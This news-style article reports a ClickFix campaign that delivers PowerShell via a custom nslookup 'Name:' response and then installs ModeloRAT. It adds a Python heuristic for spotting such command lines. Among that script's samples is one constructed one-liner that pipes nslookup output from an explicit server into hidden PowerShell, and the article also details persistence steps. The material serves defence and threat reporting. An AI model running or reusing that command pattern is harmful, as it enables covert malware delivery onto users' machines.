Threat actors are abusing DNS queries to deliver malware as part of the ClickFix social engineering technique, Microsoft warns.
ClickFix attacks typically trick users into manually executing malicious commands to ostensibly resolve errors, install updates, or enable software functionality. Victims are usually instructed to copy and run commands that ultimately download malware from attacker-controlled servers.
However, researchers at Microsoft Threat Intelligence have observed a novel variation that replaces traditional HTTP-based payload delivery with DNS lookups.
In the observed campaign, victims are instructed to open the Windows Run dialog and execute an nslookup command that queries an attacker-controlled DNS server rather than the system’s default resolver. The command requests the hostname “example.com” from a malicious DNS server at 84[.]21[.]189[.]20.
Instead of returning a normal answer, the server sends a response whose name field, the line nslookup prints as “Name:”, carries a malicious PowerShell script. The one-liner then extracts that line from nslookup’s output and executes it via cmd.exe, delivering the second-stage payload through DNS traffic alone, with no HTTP download for web filtering to inspect.
“Microsoft Defender researchers observed attackers using yet another evasion approach to the ClickFix technique: Asking targets to run a command that executes a custom DNS lookup and parses the `Name:` response to receive the next-stage payload for execution,” Microsoft Threat Intelligence said in a post on X.
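For defenders, the useful signal is the shape of the command itself rather than the hostname queried. The script below is an added example, not code from Microsoft or from the campaign, that scans process-creation command lines for the three traits described above: nslookup pointed at an explicit server instead of the system resolver, its output filtered for the Name: line, and an interpreter launched on the result. The sample command lines and the 203.0.113.5 server address are constructed for illustration.

```python
"""Heuristic detection of ClickFix-style DNS payload delivery in process-creation
command lines (added example; not Microsoft's detection logic). It flags the
pattern described in the article: nslookup aimed at an explicit DNS server, its
output parsed for the "Name:" line, and an interpreter run on what was extracted.
All sample command lines and addresses below are constructed, not observed."""
import re

# nslookup [options] <name> [<server>]: an explicit second positional argument
# means the lookup bypasses the system resolver. The server must look like an
# IPv4 address or a dotted hostname so stray tokens such as "2>nul" do not match.
NSLOOKUP_RE = re.compile(
    r"\bnslookup(?:\.exe)?\s+(?:-\S+\s+)*([A-Za-z0-9._-]+)"
    r"(?:\s+((?:\d{1,3}\.){3}\d{1,3}|[A-Za-z0-9][A-Za-z0-9-]*(?:\.[A-Za-z0-9-]+)+))?",
    re.I,
)
# cmd.exe output parsing: a for /f loop, or find/findstr filtering on "Name".
PARSE_RE = re.compile(r"\bfor\s+/f\b|\bfind(?:str)?\b[^|&]*\bname\b", re.I)
# Interpreters commonly used to execute the extracted text.
INTERP_RE = re.compile(
    r"\b(powershell|pwsh|mshta|wscript|cscript|cmd(?:\.exe)?\s+/[ck])\b", re.I
)

# Constructed sample command lines (what a Sysmon event 1 / 4688 record would carry).
SAMPLE_CMDLINES = [
    # benign: plain lookup via the default resolver
    "nslookup example.com",
    # benign-ish: explicit server, but nothing parses or executes the output
    "nslookup example.com 8.8.8.8",
    # Run-dialog style one-liner: explicit server, Name: line extracted, PowerShell run on it
    "cmd /c for /f \"tokens=2 delims=:\" %a in ('nslookup example.com 203.0.113.5 ^| "
    "findstr /i \"Name:\"') do powershell -w hidden -c \"%a\"",
    # admin script: parses output but uses the default resolver and only echoes
    "cmd /c for /f \"tokens=*\" %i in ('nslookup intranet.corp.local') do echo %i",
    # explicit server inside PowerShell, but no parsing of the result
    'powershell -c "nslookup example.com 203.0.113.5"',
]


def analyze(cmdline):
    """Return the individual indicators and an overall verdict for one command line."""
    m = NSLOOKUP_RE.search(cmdline)
    if not m:
        return {"uses_nslookup": False, "suspicious": False}
    explicit_server = m.group(2)  # None when the system resolver is used
    parses_name = bool(PARSE_RE.search(cmdline))
    # Only an interpreter launched AFTER the lookup counts: it is what runs the payload.
    im = INTERP_RE.search(cmdline[m.end():])
    interpreter = im.group(1).lower() if im else None
    suspicious = parses_name and (explicit_server is not None or interpreter is not None)
    return {
        "uses_nslookup": True,
        "explicit_server": explicit_server,
        "parses_name_field": parses_name,
        "interpreter": interpreter,
        "suspicious": suspicious,
    }


def scan(cmdlines):
    """Return (index, analysis) for every command line that trips the heuristic."""
    hits = []
    for i, cmdline in enumerate(cmdlines):
        result = analyze(cmdline)
        if result["suspicious"]:
            hits.append((i, result))
    return hits


if __name__ == "__main__":
    for idx, res in scan(SAMPLE_CMDLINES):
        print(f"[{idx}] server={res['explicit_server']} interpreter={res['interpreter']}")
        print("    ", SAMPLE_CMDLINES[idx])
```

The verdict deliberately requires output parsing plus either a non-default server or a follow-on interpreter, so an administrator's `for /f` loop over nslookup or a one-off lookup against a public resolver does not fire on its own. Run it over real Sysmon event 1 or Security 4688 command lines and tune the server pattern if your environment legitimately queries single-label DNS servers by name.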
Although it’s not clear what lure the attackers used to convince victims to run the command, researchers say the DNS-delivered PowerShell script downloads additional malware from attacker infrastructure. The follow-on payload arrives as a ZIP archive containing a Python runtime executable and malicious scripts designed to perform reconnaissance on the compromised system and its domain environment.
The attack establishes persistence by creating a VBScript file in the %APPDATA%\WPy64-31401\python directory and placing a shortcut in the Windows Startup folder to ensure execution upon login.
The final payload is ModeloRAT, a remote access trojan that allows attackers to remotely control infected machines.